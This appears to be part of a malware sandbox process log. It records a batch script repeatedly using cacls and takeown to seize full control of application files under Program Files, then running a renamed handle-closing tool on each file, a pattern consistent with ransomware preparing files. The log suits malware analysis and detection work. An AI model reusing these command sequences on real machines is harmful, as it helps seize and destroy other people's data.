C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Mail\en-US\msoeres.dll.mui"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1108
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "msoeres.dll.mui" -nobanner3⤵PID:1184
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "msoeres.dll.mui" -nobanner4⤵PID:1104
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1588
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Windows Mail\WinMail.exe""2⤵PID:1736
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Mail\WinMail.exe" /E /G Admin:F /C3⤵PID:752
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Mail\WinMail.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:320
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "WinMail.exe" -nobanner3⤵PID:2044
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "WinMail.exe" -nobanner4⤵PID:1740
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1700
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Windows Photo Viewer\fr-FR\ImagingDevices.exe.mui""2⤵PID:1620
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Photo Viewer\fr-FR\ImagingDevices.exe.mui" /E /G Admin:F /C3⤵PID:772
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Photo Viewer\fr-FR\ImagingDevices.exe.mui"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1900
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "ImagingDevices.exe.mui" -nobanner3⤵PID:904
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "ImagingDevices.exe.mui" -nobanner4⤵PID:552
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:996
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files\Windows Journal\de-DE\Journal.exe.mui""2⤵PID:848
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\de-DE\Journal.exe.mui" /E /G Admin:F /C3⤵PID:1216
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\de-DE\Journal.exe.mui"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1516
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "Journal.exe.mui" -nobanner3⤵PID:1540
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "Journal.exe.mui" -nobanner4⤵PID:1204
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1364
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files\Windows Journal\en-US\PDIALOG.exe.mui""2⤵PID:692
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\en-US\PDIALOG.exe.mui" /E /G Admin:F /C3⤵PID:1564
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\en-US\PDIALOG.exe.mui"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:796
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "PDIALOG.exe.mui" -nobanner3⤵PID:1744
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "PDIALOG.exe.mui" -nobanner4⤵PID:1768
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1108
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files\Windows Journal\fr-FR\jnwmon.dll.mui""2⤵PID:1180
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\fr-FR\jnwmon.dll.mui" /E /G Admin:F /C3⤵PID:920
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\fr-FR\jnwmon.dll.mui"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2008
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "jnwmon.dll.mui" -nobanner3⤵PID:1764
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "jnwmon.dll.mui" -nobanner4⤵PID:2004
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:320
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\RTC.der""2⤵PID:752
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\RTC.der" /E /G Admin:F /C3⤵PID:848
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\RTC.der"3⤵PID:1740
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "RTC.der" -nobanner3⤵PID:680
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "RTC.der" -nobanner4⤵PID:1564
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:796
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\end_review.gif""2⤵PID:772
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\end_review.gif" /E /G Admin:F /C3⤵PID:2044
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\end_review.gif"3⤵PID:1168
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "end_review.gif" -nobanner3⤵PID:1984
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "end_review.gif" -nobanner4⤵PID:920
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2008
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_joined.gif""2⤵PID:2004
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_joined.gif" /E /G Admin:F /C3⤵PID:904
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_joined.gif"3⤵PID:996
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "reviews_joined.gif" -nobanner3⤵PID:1364
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "reviews_joined.gif" -nobanner4⤵PID:1588
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1740
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_ok.gif""2⤵PID:1736
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_ok.gif" /E /G Admin:F /C3⤵PID:1540
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_ok.gif"3⤵PID:808
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "server_ok.gif" -nobanner3⤵PID:692
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "server_ok.gif" -nobanner4⤵PID:2044
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1712
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\warning.gif""2⤵PID:1620
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\warning.gif" /E /G Admin:F /C3⤵PID:1744
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\warning.gif"3⤵PID:552
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "warning.gif" -nobanner3⤵PID:1180
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "warning.gif" -nobanner4⤵PID:904
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1624
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-BoldIt.otf""2⤵PID:980
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-BoldIt.otf" /E /G Admin:F /C3⤵PID:2004
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-BoldIt.otf"3⤵
- Modifies file permissions
PID:1900
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "MinionPro-BoldIt.otf" -nobanner3⤵PID:1960
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "MinionPro-BoldIt.otf" -nobanner4⤵PID:1540
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1168
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\SY______.PFB""2⤵PID:1700
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\SY______.PFB" /E /G Admin:F /C3⤵PID:680
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\SY______.PFB"3⤵
- Modifies file permissions
PID:1424
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "SY______.PFB" -nobanner3⤵PID:1432
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "SY______.PFB" -nobanner4⤵PID:1744
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:996
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.hyp""2⤵PID:588
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.hyp" /E /G Admin:F /C3⤵PID:1984
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.hyp"3⤵
- Modifies file permissions
PID:1000
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "brt.hyp" -nobanner3⤵PID:1764
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "brt.hyp" -nobanner4⤵PID:2004
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:808
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng32.clx""2⤵PID:752
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng32.clx" /E /G Admin:F /C3⤵PID:1364
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng32.clx"3⤵PID:1252
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "eng32.clx" -nobanner3⤵PID:1184
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "eng32.clx" -nobanner4⤵PID:680
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:552
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CENTEURO.TXT""2⤵PID:772
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CENTEURO.TXT" /E /G Admin:F /C3⤵PID:692
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CENTEURO.TXT"3⤵PID:920
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "CENTEURO.TXT" -nobanner3⤵PID:2008
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "CENTEURO.TXT" -nobanner4⤵PID:1984
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1900
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\UKRAINE.TXT""2⤵PID:320
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\UKRAINE.TXT" /E /G Admin:F /C3⤵PID:1180
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\UKRAINE.TXT"3⤵PID:1588
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "UKRAINE.TXT" -nobanner3⤵PID:1740
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "UKRAINE.TXT" -nobanner4⤵PID:1364
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:300
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files\Windows Journal\ja-JP\NBMapTIP.dll.mui""2⤵PID:680
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\ja-JP\NBMapTIP.dll.mui" /E /G Admin:F /C3⤵PID:1168
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\ja-JP\NBMapTIP.dll.mui"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1100
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "NBMapTIP.dll.mui" -nobanner3⤵PID:1700
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "NBMapTIP.dll.mui" -nobanner4⤵PID:848
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1844
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files\Windows Journal\Templates\Month_Calendar.jtp""2⤵PID:2008
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\Templates\Month_Calendar.jtp" /E /G Admin:F /C3⤵PID:772
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\Templates\Month_Calendar.jtp"3⤵PID:1496
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "Month_Calendar.jtp" -nobanner3⤵PID:1180
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "Month_Calendar.jtp" -nobanner4⤵PID:1588
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1364
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files\Windows Journal\en-US\JNTFiltr.dll.mui""2⤵PID:1516
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\en-US\JNTFiltr.dll.mui" /E /G Admin:F /C3⤵PID:808
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\en-US\JNTFiltr.dll.mui"3⤵PID:1960
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "JNTFiltr.dll.mui" -nobanner3⤵PID:1104
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "JNTFiltr.dll.mui" -nobanner4⤵PID:1100
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:848
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files\Windows Journal\es-ES\Journal.exe.mui""2⤵PID:1620
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\es-ES\Journal.exe.mui" /E /G Admin:F /C3⤵PID:552
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\es-ES\Journal.exe.mui"3⤵
- Modifies file permissions
PID:904
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "Journal.exe.mui" -nobanner3⤵PID:588
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "Journal.exe.mui" -nobanner4⤵PID:1496
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1588
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files\Windows Journal\fr-FR\PDIALOG.exe.mui""2⤵PID:1740
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\fr-FR\PDIALOG.exe.mui" /E /G Admin:F /C3⤵PID:996
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\fr-FR\PDIALOG.exe.mui"3⤵PID:1540
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "PDIALOG.exe.mui" -nobanner3⤵PID:1168
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "PDIALOG.exe.mui" -nobanner4⤵PID:1960
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1100
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files\Windows Mail\es-ES\WinMail.exe.mui""2⤵PID:1700
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Mail\es-ES\WinMail.exe.mui" /E /G Admin:F /C3⤵PID:320
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Mail\es-ES\WinMail.exe.mui"3⤵PID:1184
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "WinMail.exe.mui" -nobanner3⤵PID:772
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "WinMail.exe.mui" -nobanner4⤵PID:1252
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1108
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files\Windows Photo Viewer\de-DE\PhotoViewer.dll.mui""2⤵PID:1776
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Photo Viewer\de-DE\PhotoViewer.dll.mui" /E /G Admin:F /C3⤵PID:1844
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Photo Viewer\de-DE\PhotoViewer.dll.mui"3⤵
- Modifies file permissions
PID:1624
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "PhotoViewer.dll.mui" -nobanner3⤵PID:1744
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "PhotoViewer.dll.mui" -nobanner4⤵PID:1000
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:752
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files\Windows Photo Viewer\ImagingDevices.exe""2⤵PID:2044
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Photo Viewer\ImagingDevices.exe" /E /G Admin:F /C3⤵PID:1364
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Photo Viewer\ImagingDevices.exe"3⤵PID:300
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "ImagingDevices.exe" -nobanner3⤵PID:552
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "ImagingDevices.exe" -nobanner4⤵PID:1900
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1252
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AGMGPUOptIn.ini""2⤵PID:1180
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AGMGPUOptIn.ini" /E /G Admin:F /C3⤵PID:1424
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AGMGPUOptIn.ini"3⤵PID:1564
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "AGMGPUOptIn.ini" -nobanner3⤵PID:1844
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "AGMGPUOptIn.ini" -nobanner4⤵PID:996
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:920
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files\Windows Journal\Templates\blank.jtp""2⤵PID:1744
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\Templates\blank.jtp" /E /G Admin:F /C3⤵PID:1776
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\Templates\blank.jtp"3⤵
- Modifies file permissions
PID:980
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "blank.jtp" -nobanner3⤵PID:1364
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "blank.jtp" -nobanner4⤵PID:796
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1496
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files\Windows Journal\Templates\To_Do_List.jtp""2⤵PID:552
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\Templates\To_Do_List.jtp" /E /G Admin:F /C3⤵PID:2044
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\Templates\To_Do_List.jtp"3⤵
- Modifies file permissions
PID:1516
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "To_Do_List.jtp" -nobanner3⤵PID:1424
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "To_Do_List.jtp" -nobanner4⤵PID:1564
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:996
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files\Windows Mail\ja-JP\WinMail.exe.mui""2⤵PID:1540
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Mail\ja-JP\WinMail.exe.mui" /E /G Admin:F /C3⤵PID:1700
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Mail\ja-JP\WinMail.exe.mui"3⤵PID:1620
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "WinMail.exe.mui" -nobanner3⤵PID:1764
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "WinMail.exe.mui" -nobanner4⤵PID:980
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:796
-
-
-
